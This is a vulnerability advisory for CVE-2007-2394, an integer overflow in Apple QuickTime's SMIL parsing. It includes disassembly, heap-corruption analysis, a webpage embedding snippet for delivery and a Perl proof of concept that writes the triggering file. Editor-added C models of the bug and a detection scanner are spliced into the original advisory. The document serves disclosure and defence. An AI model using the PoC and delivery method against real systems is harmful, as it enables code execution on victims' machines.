======================================================================
Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================

Date: 09/03/2007
Author: David Vaartjes <d.vaartjes at gmail.com>
Identifier: CVE-2007-2394
Revision: 0.2

----------------------------------------------------------------------
AFFECTED VERSIONS
----------------------------------------------------------------------

Researched on QuickTime 7.1.3 running on Windows 2000 SP4.

iDefense also confirmed the existence of this vulnerability in versions
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X [1]. As the QuickTime
binaries for Windows XP and Vista are identical, this issue will also
affect QuickTime running on Windows Vista.

----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------

Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.

QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.

----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------

QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].

The Synchronized Multimedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify which
media elements to present and where and when to present them.

----------------------------------------------------------------------
VULNERABILITY DESCRIPTION
----------------------------------------------------------------------

An integer overflow vulnerability exists in the part of QuickTime.qts
that calculates the size of a buffer that stores the title and author
fields of a SMIL file. This can be exploited to overflow that heap
buffer with user supplied content, which can eventually result in the
execution of arbitrary code.

----------------------------------------------------------------------
VULNERABILITY DETAILS
----------------------------------------------------------------------

The integer overflow can be triggered by creating a SMIL file
containing a title and author field of a specific length.

--
<smil>
<head>
 <meta name="title" content="specific-length"/>
 <meta name="author" content="specific-length"/>
</head>
</smil>
--

When such a SMIL file is parsed, the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is (sign) extended to a long int data
type (32 bit):

--
66952C9A     push    eax
66952C9B     call    sub_668B57D0
66952CA0 --> movsx   eax, word ptr [esp+2Ch+var_C]
66952CA5     mov     edx, [esp+2Ch+arg_4]
66952CA9     lea     ecx, [esp+2Ch+var_10]
--

So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.

Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:

--
668DD04D     jnz     short loc_668DD0A0
668DD04F     test    ebx, ebx
668DD051     jz      loc_668DD1EB
668DD057 --> lea     eax, [edi+ebx]   // edi holds the length of
                                      // the title field + 0x20.
                                      // ebx holds the sign
                                      // extended length of the
                                      // author field.
668DD05A     push    eax
668DD05B     push    ecx
--

In sub_668DCA60(), 4 is added to the result of the calculation:

--
668DCB37     test    edi, edi
668DCB39     jz      short loc_668DCB40
668DCB3B --> lea     eax, [edi+4]     // edi holds the result
668DCB3E     jmp     short loc_668DCB42
--

Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapReAlloc():

--
668F555E     push    eax              // dwBytes (user specified)
668F555F     push    ecx              // lpMem
668F5560     push    1                // dwFlags
668F5562     push    edx              // hHeap
668F5563 --> call    ds:HeapReAlloc
--

This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:

1: sub_66952B50():

0x0000ff00 will be sign extended to 0xffffff00.

2: sub_668DCFD0():

0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00,
resulting in a length value of 0xffffffff.

3: sub_668DCA60():

0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.

4: sub_668F5550():

HeapReAlloc() will allocate 0x00000003 bytes of memory.

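The four-step calculation above, as an added C model that is not part of the advisory and not QuickTime code: vulnerable_buffer_size() reproduces the short-to-long sign extension, the title + 0x20 addition and the final + 4 exactly as the listings describe, vulnerable_copy_count() gives the value that reaches memcpy() as its count, copy_overflows() compares the two, and checked_buffer_size() is one way the same computation could have been bounded. The function names are the editor's own stand-ins for sub_66952B50(), sub_668DCFD0(), sub_668DCA60() and sub_668F5550(); the model assumes the two's-complement narrowing that the x86 toolchains concerned perform.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added model of the size calculation described in the advisory; the
 * function names are the editor's own and are not QuickTime.qts symbols. */

/* Flawed chain: length stored in a 16-bit short (no bounds check), movsx
 * to 32 bits (sub_66952B50), + (title_len + 0x20) (sub_668DCFD0), + 4
 * (sub_668DCA60). The result is the dwBytes handed to HeapReAlloc(). */
uint32_t vulnerable_buffer_size(uint32_t title_len, uint32_t author_len)
{
    int16_t  author_short = (int16_t)author_len;  /* 0xff00 becomes -256 */
    int32_t  author_ext   = author_short;         /* movsx: 0xffffff00 */
    uint32_t partial      = (title_len + 0x20u) + (uint32_t)author_ext;
    return partial + 4u;                          /* wraps modulo 2^32 */
}

/* The memcpy() count is the sign-extended author length itself (ebx in
 * the listing), not the wrapped allocation size. */
uint32_t vulnerable_copy_count(uint32_t author_len)
{
    return (uint32_t)(int32_t)(int16_t)author_len;
}

/* True when more bytes are copied than were allocated, i.e. the heap
 * buffer overflows. */
bool copy_overflows(uint32_t title_len, uint32_t author_len)
{
    return vulnerable_copy_count(author_len) >
           vulnerable_buffer_size(title_len, author_len);
}

/* One way to bound the same computation: reject any field that does not
 * fit the 16-bit slot as a non-negative value, so every later addition
 * stays far below 2^32 and the allocation always covers the copy.
 * Returns the byte count, or -1 when a field is rejected. */
int64_t checked_buffer_size(uint32_t title_len, uint32_t author_len)
{
    const uint32_t field_max = 0x7fffu;           /* largest non-negative int16 */
    if (title_len > field_max || author_len > field_max)
        return -1;
    return (int64_t)title_len + 0x20 + author_len + 4; /* at most 0x10022 */
}

int main(void)
{
    /* the advisory's values: title 0xdf (223), author 0xff00 (65280) */
    printf("vulnerable dwBytes: 0x%08x\n",
           (unsigned)vulnerable_buffer_size(223, 65280));   /* 0x00000003 */
    printf("memcpy count:       0x%08x\n",
           (unsigned)vulnerable_copy_count(65280));         /* 0xffffff00 */
    printf("overflow:           %s\n", copy_overflows(223, 65280) ? "yes" : "no");
    printf("checked size:       %lld\n",
           (long long)checked_buffer_size(223, 65280));     /* -1, rejected */
    return 0;
}
```

The check rejects at 0x7fff rather than at some larger "reasonable" bound on purpose: the defect is that a value crosses the sign bit of the slot it is stored in, so the bound has to match the width of that slot, not the size of the final buffer.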
Next, the pointer returned by HeapReAlloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():

--
668DD08E     push    ebx              // count, length value right
                                      // after sign extension
                                      // (0xffffff00).
668DD08F     push    edx              // src, buffer with user
                                      // supplied (author) content.
668DD090     add     eax, esi
668DD092 --> push    eax              // dest, 3 byte buffer.
668DD093     call    _memcpy
668DD098     add     esp, 18h
668DD09B     jmp     loc_668DD1E5
--

This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.

For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:

--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--

--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--

The unlink instructions will result in the following exception:

---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe

"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------

This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.
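A defender-side check for the trigger condition described in this section, added here as an example that is not part of the advisory: a small C scanner that measures the title and author content lengths in a SMIL file's <meta> elements and flags an author field of 0x8000 bytes or more, the point at which the 16-bit length turns negative. The helper names and the constructed sample documents are the editor's own; the scanner matches the exact attribute layout shown in the advisory and is not a general XML parser.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not from the advisory. Flags SMIL documents whose author
 * field is long enough for its 16-bit length to sign-extend to a negative
 * 32-bit value (>= 0x8000), the trigger condition described above. */

#define AUTHOR_LEN_LIMIT 0x8000L

/* Length of the content="..." value of <meta name="NAME" .../>, or -1 if
 * the element is absent or unterminated. A flat string scan that only
 * understands the attribute order and quoting used in the advisory. */
long smil_meta_content_len(const char *smil, const char *name)
{
    char needle[64];
    if (snprintf(needle, sizeof needle, "<meta name=\"%s\" content=\"", name)
            >= (int)sizeof needle)
        return -1;
    const char *start = strstr(smil, needle);
    if (start == NULL)
        return -1;
    start += strlen(needle);
    const char *end = strchr(start, '"');
    return end == NULL ? -1 : (long)(end - start);
}

/* True when the document carries an author field of AUTHOR_LEN_LIMIT bytes
 * or more; title_len/author_len receive the measured lengths for logging. */
bool smil_author_len_suspicious(const char *smil, long *title_len, long *author_len)
{
    *title_len  = smil_meta_content_len(smil, "title");
    *author_len = smil_meta_content_len(smil, "author");
    return *author_len >= AUTHOR_LEN_LIMIT;
}

/* Constructed test input: a SMIL skeleton in the advisory's layout with the
 * title and author fields filled to the requested lengths. Caller frees. */
char *build_smil(size_t title_len, size_t author_len)
{
    static const char head[] = "<smil>\n<head>\n <meta name=\"title\" content=\"";
    static const char mid[]  = "\"/>\n <meta name=\"author\" content=\"";
    static const char tail[] = "\"/>\n</head>\n</smil>\n";
    size_t n = (sizeof head - 1) + title_len + (sizeof mid - 1) + author_len + sizeof tail;
    char *buf = malloc(n);
    if (buf == NULL)
        return NULL;
    char *p = buf;
    memcpy(p, head, sizeof head - 1); p += sizeof head - 1;
    memset(p, 'x', title_len);        p += title_len;
    memcpy(p, mid, sizeof mid - 1);   p += sizeof mid - 1;
    memset(p, 'x', author_len);       p += author_len;
    memcpy(p, tail, sizeof tail);     /* includes the terminating NUL */
    return buf;
}

/* Builds a document with the given field lengths, scans it and frees it. */
bool lengths_flagged(size_t title_len, size_t author_len)
{
    long t, a;
    char *doc = build_smil(title_len, author_len);
    if (doc == NULL)
        return false;
    bool flagged = smil_author_len_suspicious(doc, &t, &a);
    printf("title=%ld author=%ld suspicious=%d\n", t, a, (int)flagged);
    free(doc);
    return flagged;
}

int main(void)
{
    lengths_flagged(20, 40);       /* benign: not flagged */
    lengths_flagged(223, 65280);   /* the advisory's lengths: flagged */
    return 0;
}
```

The threshold is the sign-extension boundary rather than the specific 0xff00 used in the proof of concept, so the check covers the whole range the advisory gives (0x8000 to 0xffff). Because it is a plain substring scan, it will miss single-quoted attributes or a different attribute order; a gateway filter would sit this logic behind a real XML parser.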

----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------

This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the latter
scenario the OBJECT (IE) and/or EMBED (Firefox) tags can be used:

<OBJECT
 CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
 CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
 WIDTH="10" HEIGHT="10" >
 <!-- malicious SMIL file -->
 <PARAM NAME="src" VALUE="poc.smil" />
 <EMBED
  <!-- available .qtif or .mov file to start up QT for FF -->
  SRC="available-sample.qtif"
  <!-- malicious SMIL file -->
  QTSRC="poc.smil"
  WIDTH="10" HEIGHT="10"
  PLUGINSPAGE="www.apple.com/quicktime/download"
  TYPE="video/quicktime"
 />
</OBJECT>

----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------

#!/usr/bin/perl -w

####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####

use strict;

my $file = "poc.smil";
my $padd = "x";          # filler byte for the meta fields
my $cop_len = 36;        # copyright field length

####
# By choosing the following lengths the
# integer overflow will be triggered.
####

my $tit_len = 223;       # 0xdf: title length + 0x20 = 0xff
my $auth_len = 65280;    # 0xff00: sign extends to 0xffffff00

open(FH, ">$file") or die "Can't open file: $!";

print FH
 "<smil>\n".
 "<head>\n".
 " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
 " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
 " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
 "</head>\n".
 "</smil>";

close(FH);

----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------

[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/

----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------

04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory